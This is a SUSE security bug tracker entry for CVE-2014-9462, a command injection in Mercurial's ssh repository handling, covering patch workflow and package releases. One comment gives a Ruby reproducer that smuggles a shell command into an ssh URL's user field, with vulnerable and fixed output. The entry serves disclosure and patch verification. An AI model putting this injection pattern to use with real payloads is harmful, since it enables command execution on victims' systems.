Bug 923070 (CVE-2014-9462) - VUL-0: CVE-2014-9462: mercurial: Command Injection via sshpeer._validaterepo()
Summary: VUL-0: CVE-2014-9462: mercurial: Command Injection via sshpeer._validaterepo()
Status: RESOLVED FIXED
Alias: CVE-2014-9462
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: Other Other
: P3 - Medium : Normal
Target Milestone: ---
Deadline: 2015-04-01
Assignee: Security Team bot
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/114874/
Whiteboard: maint:released:sle11-sp3:61266
Keywords:
Depends on:
Blocks:
 
Reported: 2015-03-18 21:47 UTC by Marcus Meissner
Modified: 2015-06-17 13:07 UTC (History)
3 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Marcus Meissner 2015-03-18 21:47:44 UTC 
via canonical cve

CVE-2014-9462

http://chargen.matasano.com/chargen/2015/3/17/this-new-vulnerability-mercurial-command-injection-cve-2014-9462.html

sshpeer._validaterepo() allows code injection

References:
http://people.canonical.com/~ubuntu-security/cve/2014/CVE-2014-9462.html
Comment 1 Swamp Workflow Management 2015-03-18 21:51:34 UTC 
An update workflow for this issue was started.
This issue was rated as moderate.
Please submit fixed packages until 2015-04-01.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/61215
Comment 2 Swamp Workflow Management 2015-03-18 23:00:49 UTC 
bugbot adjusting priority
Comment 3 Takashi Iwai 2015-03-20 12:20:59 UTC 
The package has been submitted to SLE11, SLE11-SP3, SLE12, openSUSE-13.1 and openSUSE-13.2.  mercurial 3.3.2 on FACTORY already contains the fix.
Comment 4 Bernhard Wiedemann 2015-03-20 13:00:08 UTC 
This is an autogenerated message for OBS integration:
This bug (923070) was mentioned in
https://build.opensuse.org/request/show/292024 13.2 / mercurial
https://build.opensuse.org/request/show/292025 13.1 / mercurial
Comment 6 Swamp Workflow Management 2015-03-27 17:04:55 UTC 
openSUSE-SU-2015:0617-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 923070
CVE References: CVE-2014-9462
Sources used:
openSUSE 13.2 (src):    mercurial-3.1.2-4.1
openSUSE 13.1 (src):    mercurial-2.7.1-2.4.1
Comment 7 Johannes Segitz 2015-05-05 09:37:34 UTC 
Reproducer:
#!/usr/bin/env ruby

repo_name='ssh://user;echo vulnerable;@example.com/hg/'

system('hg', 'clone', repo_name, "/tmp/xxxx" )

Vulnerable output:
ssh user;echo vulnerable;@example.com 'hg init hg/'
ssh: Could not resolve hostname user: Name or service not known
vulnerable
/bin/sh: @example.com: command not found
abort: could not create remote repo!

Good output:
ssh 'user;echo vulnerable;'@example.com 'hg init hg/'
Then it hangs for a while, you can kill it.
Comment 8 Swamp Workflow Management 2015-05-05 12:05:04 UTC 
SUSE-SU-2015:0817-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 923070
CVE References: CVE-2014-9462
Sources used:
SUSE Linux Enterprise Software Development Kit 11 SP3 (src):    mercurial-2.3.2-0.9.2
Comment 9 Swamp Workflow Management 2015-05-08 09:05:09 UTC 
SUSE-SU-2015:0836-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 923070
CVE References: CVE-2014-9462
Sources used:
SUSE Linux Enterprise Software Development Kit 12 (src):    mercurial-2.8.2-3.1
Comment 10 Marcus Meissner 2015-06-17 13:07:51 UTC 
released